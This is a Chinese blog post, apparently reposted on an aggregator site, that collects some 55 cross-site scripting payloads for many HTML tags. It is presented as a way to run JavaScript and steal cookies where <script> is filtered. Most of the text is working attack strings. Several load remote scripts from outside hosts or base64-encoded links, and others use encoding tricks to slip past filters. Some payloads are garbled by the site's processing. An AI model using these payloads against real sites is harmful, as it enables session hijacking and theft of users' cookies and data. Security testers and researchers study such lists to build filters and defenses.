xss其他标签下的js用法总结大全 20160711
来源:互联网 发布:2015淘宝双11销售额 编辑:程序博客网 时间:2024/06/05 16:12
前段时间我遇到一个问题,就是说普通的平台获取cookie的语句为↓
实际上我们的测试语句可能为↓
也就是说js语句实际上是位于↓
<script></script>的中间。
包括<img>、<input>、<object>、<iframe>、<a></a>、<svg>、标签等情况下的xss构造。
所以我们就需要了解各种标签下的js用法,不然很多时候不可以使用<script>就很麻烦了。
【XSS基本探测pyload】
【各标签实战pyload】
——————————————————-xss其他标签下的js用法总结大全––——————————–————————————
<textarea class="crayon-plain print-no" data-settings="dblclick" readonly="readonly" style="-moz-tab-size: 4; font-size: 12px ! important; line-height: 15px ! important; z-index: 0; opacity: 0; overflow: hidden;" wrap="soft"><img src=javascript:document.write('<scr'+'ipt src=\'http://www.baidu.com/1.txt\'></scr'+'ipt>')></img> //仅支持IE6 <img src=javascript:window.s=document.createElement('script');window.s.src='http://lcx.cc/1.js';document.body.appendChild(window.s);></img> //仅支持IE6 <img src="pdpdp.gif"></img> //通杀所有浏览器 能触发xss <img src="pdpdp.gif"></img> //通杀所有浏览器 能触发xss <img src=x onerror=document.body.appendChild(document.createElement("scr"+"ipt")).src="http://www.baidu.com"> <input autofocus="bbbb" /> <object data="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3QuY24vUkd1V0REUz48L3NjcmlwdD4="></object> <iframe width="0px" height="0px" src="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3QuY24vUkd1V0REUz48L3NjcmlwdD4="></iframe> ie不支持 <a href="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3d3dy5wb29qeC5jb20vMS5qcz48L3NjcmlwdD4=">sb</a> <anchor>、<img>(不执行js) <a>(需点击) <meta>..... <anchor onload=document.body.appendChild(document.createElement("scr"+"ipt")).src="http://www.baidu.com"> <svg onload=document.body.appendChild(document.CReateElement("scr"+"ipt")).src="http://www.baidu.com"> <svg onload=document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,116,46,99,110,47,82,71,117,87,68,68,83,62,60,47,115,99,114,105,112,116,62))> <baa id="1" tabindex=0> (1)普通的XSS JavaScript注入<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (3)IMG标签无分号无引号<IMG SRC=javascript:alert(‘XSS’)> (4)IMG标签大小写不敏感<IMG SRC=JaVaScRiPt:alert(‘XSS’)> (5)HTML编码(必须有分号)<IMG SRC=javascript:alert(“XSS”)> (6)修正缺陷IMG标签<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”> (7)formCharCode标签<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> (8)UTF-8的Unicode编码<IMG SRC=jav..省略..S')> (9)7位的UTF-8的Unicode编码是没有分号的<IMG SRC=jav..省略..S')> (10)十六进制编码也是没有分号<IMG SRC=\'#\'" /span> (11)嵌入式标签,将Javascript分开<IMG SRC=\'#\'" ascript:alert(‘XSS’);”> (12)嵌入式编码标签,将Javascript分开<IMG SRC=\'#\'" ascript:alert(‘XSS’);”> (13)嵌入式换行符<IMG SRC=\'#\'" ascript:alert(‘XSS’);”> (14)嵌入式回车<IMG SRC=\'#\'" ascript:alert(‘XSS’);”> (15)嵌入式多行注入JavaScript,这是XSS极端的例子<IMG SRC=\'#\'" /span> (16)解决限制字符(要求同页面)<script>z=’document.’</script><script>z=z+’write(“‘</script><script>z=z+’<script’</script><script>z=z+’ src=ht’</script><script>z=z+’tp://ww’</script><script>z=z+’w.shell’</script><script>z=z+’.net/1.’</script><script>z=z+’js></sc’</script><script>z=z+’ript>”)’</script><script>eval_r(z)</script> (17)空字符perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out (19)Spaces和meta前的IMG标签<IMG SRC=\'#\'" javascript:alert(‘XSS’);”> (20)Non-alpha-non-digit XSS<SCRIPT/XSS SRC=\'#\'" /span>[url=http://3w.org/XSS/xss.js]http://3w.org/XSS/xss.js[/url]”></SCRIPT> (21)Non-alpha-non-digit XSS to 2<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)> (22)Non-alpha-non-digit XSS to 3<SCRIPT/SRC=\'#\'" /span>[url=http://3w.org/XSS/xss.js]http://3w.org/XSS/xss.js[/url]”></SCRIPT> (23)双开括号<<SCRIPT>alert(“XSS”);//<</SCRIPT> (24)无结束脚本标记(仅火狐等浏览器)<SCRIPT SRC=http://3w.org/XSS/xss.js?<B> (25)无结束脚本标记2<SCRIPT SRC=//3w.org/XSS/xss.js> (26)半开的HTML/JavaScript XSS<IMG SRC=\'#\'" /span> (27)双开角括号<iframe src=http://3w.org/XSS.html < (28)无单引号 双引号 分号<SCRIPT>a=/XSS/alert(a.source)</SCRIPT> (29)换码过滤的JavaScript\”;alert(‘XSS’);// (30)结束Title标签</TITLE><SCRIPT>alert(“XSS”);</SCRIPT> (31)Input Image<INPUT SRC=\'#\'" /span> (32)BODY Image<BODY BACKGROUND=”javascript:alert(‘XSS’)”> (33)BODY标签<BODY(‘XSS’)> (34)IMG Dynsrc<IMG DYNSRC=\'#\'" /span> (35)IMG Lowsrc<IMG LOWSRC=\'#\'" /span> (36)BGSOUND<BGSOUND SRC=\'#\'" /span> (37)STYLE sheet<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”> (38)远程样式表<LINK REL=”stylesheet” HREF=”[url=http://3w.org/xss.css]http://3w.org/xss.css[/url]”> (39)List-style-image(列表式)<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS (40)IMG VBscript<IMG SRC=\'#\'" /STYLE><UL><LI>XSS (41)META链接url<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”> (42)Iframe<IFRAME SRC=\'#\'" /IFRAME> (43)Frame<FRAMESET><FRAME SRC=\'#\'" /FRAMESET> (44)Table<TABLE BACKGROUND=”javascript:alert(‘XSS’)”> (45)TD<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”> (46)DIV background-image<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”> (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”> (48)DIV expression<DIV STYLE=”width: expression_r(alert(‘XSS’));”> (49)STYLE属性分拆表达<IMG STYLE=”xss:expression_r(alert(‘XSS’))”> (50)匿名STYLE(组成:开角号和一个字母开头)<XSS STYLE=”xss:expression_r(alert(‘XSS’))”> (51)STYLE background-image<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A> (52)IMG STYLE方式exppression(alert(“XSS”))’> (53)STYLE background<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE> (54)BASE<BASE HREF=”javascript:alert(‘XSS’);//”> (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS<EMBED SRC=\'#\'" /span>[flash]http://3w.org/XSS/xss.swf[/flash]” ></EMBED></textarea>
——————————————-xss其他标签下的js用法总结大全––——————————–————————————
类似的东西也有人发过,我针对XSS利用中的各标签利用实例整理了下。算是比较全面的。
0 0
- xss其他标签下的js用法总结大全 20160711
- xss其他标签下的js用法总结大全
- xss其他标签下的js用法总结
- jstl标签的用法大全
- xss的用法
- jstl标签用法大全
- Meta标签用法大全
- XSS知识的总结
- 【前端开发】a标签href的其他用法
- DVWA下的XSS
- HTML 标签总结大全
- js标签的几种用法
- 其他的常用标签
- 其他类型的标签
- html的其他标签
- js Array的用法总结
- js的settimeout用法总结
- jstl标签学习总结-以及的用法
- 学问之道无他求其放心而已矣
- MVVM初识
- dataFrame操作
- Windows 7下Git SSH 创建Key的步骤(by 星空武哥)
- c++ new和不new对象的区别
- xss其他标签下的js用法总结大全 20160711
- 机器学习面试问题7
- POJ-3630 Phone List(字典树)
- android用aapt命令实现打包时替换资源
- AC自动机 ( 动态建树模板 )——Keywords Search ( HDU 2222 )
- Android傻瓜式分包插件
- PP详解-工单完成
- 常用的linux文件权限
- Presto Benchmark Driver 的使用